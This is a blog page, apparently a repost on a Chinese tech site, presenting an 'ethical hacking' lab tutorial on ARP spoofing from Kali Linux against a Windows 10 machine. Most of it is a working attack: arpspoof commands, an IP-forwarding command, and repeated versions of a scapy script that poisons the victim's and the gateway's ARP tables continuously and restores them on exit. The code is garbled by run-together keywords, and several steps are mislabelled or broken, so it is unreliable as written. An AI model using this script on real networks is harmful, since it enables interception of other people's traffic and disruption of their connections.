python hacking_Python Ethical Hacking - ARP Spoofing

最新推荐文章于 2020-12-13 09:50:35 发布
最新推荐文章于 2020-12-13 09:50:35 发布
阅读量146 收藏
点赞数
文章标签: python hacking

Typical Network

ARP Spoofing

Why ARP Spoofing is possible:

1. Clients accept responses even if they did not send a request.

2. Clients trust response without any form of verification.

1. Run the following command on the victim - Windows 10 Machine.

arp -a

2. Run the following command on the Kali Linux machine.

arp -a

3. Use the tool arpspoof on the Kali Linux to perform the test.

arpspoof -i eth1 -t 10.0.0.210 10.0.0.1arpspoof-i eth1 -t 10.0.0.1 10.0.0.210

3. Perform the following command again on the victim Windows 10 machine. The MAC address of the router changed to the MAC address of Kali Linux.

arp -a

4. Run the command on Kali Linux.

echo 1 > /proc/sys/net/ipv4/ip_forward

4. Find useful information on the Kali and write the Python code.

#!/usr/bin/env python

importscapy.all as scapy

packet= scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")print(packet.show())print(packet.summary())

Result:

Python Script:

#!/usr/bin/env python

importscapy.all as scapy

packet= scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")

scapy.send(packet)

Execute the script on Kali and watch the change on the victim Windows 10 machine.

Rewrite the Python Script.

#!/usr/bin/env python

importscapy.all as scapydefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet)

spoof("10.0.0.210", "10.0.0.1")

spoof("10.0.0.1", "10.0.0.210")

Execute the script and watch the change on victim Windows 10 machine.

Rewrite the Python script to perform the spoof continuously.

#!/usr/bin/env python

importscapy.all as scapyimporttimedefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet)whileTrue:

spoof("10.0.0.210", "10.0.0.1")

spoof("10.0.0.1", "10.0.0.210")

time.sleep(2)

Enable the IP forward on Kali Linux.

echo 1 /proc/sys/net/ipv4/ip_forward

Now the target Win10 machine can browse the Internet normally.

Use the while structure to show the packets sent count.

#!/usr/bin/env python

importscapy.all as scapyimporttimedefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet, verbose=False)

sent_packets_count=0whileTrue:

spoof("10.0.0.210", "10.0.0.1")

spoof("10.0.0.1", "10.0.0.210")

sent_packets_count= sent_packets_count + 2

print("[+] Packets sent:" +str(sent_packets_count))

time.sleep(2)

Execute the Python script.

Rewrite the Python Script in Python2:

#!/usr/bin/env python

importscapy.all as scapyimporttimeimportsysdefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet, verbose=False)

sent_packets_count=0whileTrue:

spoof("10.0.0.210", "10.0.0.1")

spoof("10.0.0.1", "10.0.0.210")

sent_packets_count= sent_packets_count + 2

print("\r[+] Packets sent:" +str(sent_packets_count)),

sys.stdout.flush()

time.sleep(2)

Execute the new script and find the change in the terminal.

Rewrite the script in Python3 compatibility :

#!/usr/bin/env python

importscapy.all as scapyimporttimedefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet, verbose=False)

sent_packets_count=0whileTrue:

spoof("10.0.0.210", "10.0.0.1")

spoof("10.0.0.1", "10.0.0.210")

sent_packets_count= sent_packets_count + 2

print("\r[+] Packets sent:" + str(sent_packets_count), end="")

time.sleep(2)

HANDLING EXCEPTIONS

try/except can be used to handle errors.

Write default code in a try block.

Write code to run if an error occurs in except block.

-> if an error occurs exception block gets executed, otherwise try code gets executed.

Using the try ... catch structure to handle the KeyboardInterrupt Error.

#!/usr/bin/env python

importscapy.all as scapyimporttimeimportsysdefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet, verbose=False)

sent_packets_count=0whileTrue:

spoof("10.0.0.210", "10.0.0.1")

spoof("10.0.0.1", "10.0.0.210")

sent_packets_count= sent_packets_count + 2

print("\r[+] Packets sent:" +str(sent_packets_count)),

sys.stdout.flush()

time.sleep(2)

Execution result:

Rewrite the Python Script to restore the network after quite.

#!/usr/bin/env python

importscapy.all as scapyimporttimeimportsysdefget_mac(ip):

arp_request= scapy.ARP(pdst=ip)

broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

arp_request_broadcast= broadcast/arp_request

answered_list= scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrcdefspoof(target_ip, spoof_ip):

target_mac=get_mac(target_ip)

packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

scapy.send(packet, verbose=False)defrestore(destination_ip, source_ip):

destination_mac=get_mac(destination_ip)

source_mac=get_mac(source_ip)

packet= scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)

scapy.send(packet, count=4, verbose=False)

target_ip= "10.0.0.210"gateway_ip= "10.0.0.1"sent_packets_count=0try:whileTrue:

spoof(target_ip, gateway_ip)

spoof(gateway_ip, target_ip)

sent_packets_count= sent_packets_count + 2

print("\r[+] Packets sent:" +str(sent_packets_count)),

sys.stdout.flush()

time.sleep(2)exceptKeyboardInterrupt:print("[+] Detected CTRL+C ...... Resetting ARP tables...... Please wait")

restore(target_ip, gateway_ip)

restore(gateway_ip, target_ip)

weixin_39674293
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Module_python_hacking_
09-29
【标题】"Module_python_hacking_" 暗示了这个压缩包可能包含了关于使用Python进行模块化黑客技术的内容。在IT行业中,"hack"这个词经常用于描述非传统或创新性的解决方案,而“Module”通常指的是代码组织的单元,...
基于python发送ARP欺骗消息
xyjincan
05-30 1902
基于python发送ARP欺骗消息测试通过发送ARP欺骗数据包阻断局域网两台机器的连接发送arp欺骗包攻击成功后,18与19之前通信中断18主机上ARP变更情况python3发送arp欺骗python2发送arp欺骗Centos7 ip命令参考 测试通过发送ARP欺骗数据包阻断局域网两台机器的连接 利用linux下python的socket标准库(socket.socket(socket.AF_P...
python 使用scapy库进行ARP欺骗
热门推荐
Jeanphorn的专栏
05-14 1万+
1. 说明  ARP欺骗(ARP spoofing),又称ARP病毒(ARP poisoning)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定电脑或所有电脑无法正常连接。最早探讨ARP欺骗的文章是由Yuri Volobue所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection g
Python实现ARP欺骗
xiaoxiao的博客
04-02 6679
实验目的:局域网段扫描,利用arp欺骗抓包获取密码 :局域网上的一台主机,如果接收到一个ARP报文,即使该报文不是该主机所发送的ARP请求的应答报文,该主机也会将ARP报文中的发送者的MAC地址和IP地址更新或加入到ARP表中。ARP欺骗攻击就利用了这点,攻击者主动发送ARP报文。通过不断发送这些伪造的ARP报文,让局域网上所有的主机和网关ARP表,其对应的MAC地址均为攻击者的MAC地址,这样所...
Python利用scapy实现ARP欺骗
shichimiyasatone的博客
03-27 1万+
一、实验原理。        本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapy中scapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送:eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hws...
Python 协议攻击脚本(五): ARP欺骗 Arpspoof
酉酉的博客
04-28 3321
ARP arp协议 ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。 arp欺骗 ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MA...
「Linux」Oldschool_way_of_hacking_MicroDigital_ip-cameras - 应急响
11-29
「Linux」Oldschool_way_of_hacking_MicroDigital_ip-cameras - 应急响应 数据治理 网络安全 安全对抗 数据泄露 渗透测试
「安全测试」Hacking_You_Without_Password - 企业安全.zip
12-04
「安全测试」Hacking_You_Without_Password - 企业安全 工控安全 基础架构安全 红蓝对抗 自动化 攻防靶场
Ethical_Hacking_Python
03-31
Ethical_Hacking_Python
Python-Ethical-Hacking-Scripts
03-28
Python道德黑客脚本 如果您不知道谁是我和我在做什么,请查看我的个人资料! IP检查器/拼写PYTHON脚本 我需要12分钟来创建它,希望您会使用它。 IP INT生成器PYTHON脚本 嗨,我被创建了这个脚本,我需要像25分钟一样...
Python Hacking Tools - Password Sniffing
weixin_30345577的博客
08-10 152
Password Sniffing with Scapy 1. Download and install the Scapy first. pip install scapy https://scapy.net/ 2. Target Website https://aavtrain.com/index.asp 3. Write the Python cod...
Hacking
Python之禅的专栏
10-11 286
凯撒大帝是罗马帝国的奠基人,他是一名杰出的政治家,军事家。不过今天不是讲他的历史故事,而是讲一个算法,叫凯撒密码,凯撒密码的原理很简单:就是通过把字母移动一定的位数来实现...
Hacking python系列教程
0ffs3t
02-03 1314
1. python basics] python基础 (上) ======================================================================= 在线观看:http://www.cnhhu.com/v/cnhhul00085/index.html ===========================================
python hacking课程_Hacking python系列教程 | 学步园
weixin_39797912的博客
12-13 124
1.pythonbasics]python基础(上)=======================================================================在线观看:http://www.cnhhu.com/v/cnhhul00085/index.html=================================================...
“人力资源+大数据+薪酬报告+涨薪调薪”
08-12
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
深度报告-20231012-东海证券-电力设备与新能源行业深度报告-长时储能东风起-钒电需求待腾飞-42页-3mb.pdf
08-12
深度报告-20231012-东海证券-电力设备与新能源行业深度报告_长时储能东风起_钒电需求待腾飞_42页_3mb.pdf
基于Python+JavaScript实现的联邦学习网站系统源码+文档说明(高分毕业设计)
08-12
<项目介绍> 毕设 前端: React-Hook Material UI axios请求数据 token头请求验证 Echarts图可视化 后端: Django框架 写API运行算法传数据 在本系统中,用户通过邮箱注册后登录进入首页,可以通过导航栏快速跳转到实验设置,实验过程,实验数据查看和退出登录等,也可以通过侧边栏来选择算法进行实验,点击不同的 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
基于Springboot和Vue的公司日常考勤系统源码 公司日常考勤系统代码(优秀毕业设计)
08-12
公司日常考勤系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
vue2+vuex3+vur-router3
最新发布
08-12
vue2+vuex3+vur-router3
Python破解密码的秘密:《Hacking Secret Ciphers》
《利用Python破解秘密密码》(Hacking Secret Ciphers with Python) 是由Al Sweigart在2013年编著的一本书。这本书将黑客技术与Python编程语言相结合,引导读者探索密码学世界,学习如何通过编程手段破解简单的密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值